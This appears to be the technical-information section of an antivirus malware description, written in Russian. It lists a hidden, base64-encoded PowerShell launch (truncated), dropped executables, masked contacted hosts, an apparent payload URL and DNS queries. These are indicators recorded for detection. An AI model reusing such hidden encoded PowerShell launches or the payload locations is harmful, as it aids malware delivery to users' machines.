Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABRAGEAbAB4AHUAYQB1AGoAZQBtAGQAPQAnAEIAegBzAHkAZABzAHUAcAAnADsAJABVAGgAdQBiAG8AaABsAGIAcgB6AGsAIAA9ACAAJwA0ADgAJwA7ACQAUgBkAHMAegB5AGIAagBsAGIAPQAnAEkAZQBkAHY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\1203750.cvr
- %HOMEPATH%\48.exe
- %HOMEPATH%\48.exe
- 'yo######smyartschool.com':80
- 'gl####gymnastics.co':80
- http://yo######smyartschool.com/wp-snapshots/lyf/
- DNS ASK yo######smyartschool.com
- DNS ASK em##ech.vn
- DNS ASK gl####gymnastics.co
- DNS ASK he###are.net
- DNS ASK bo###360.com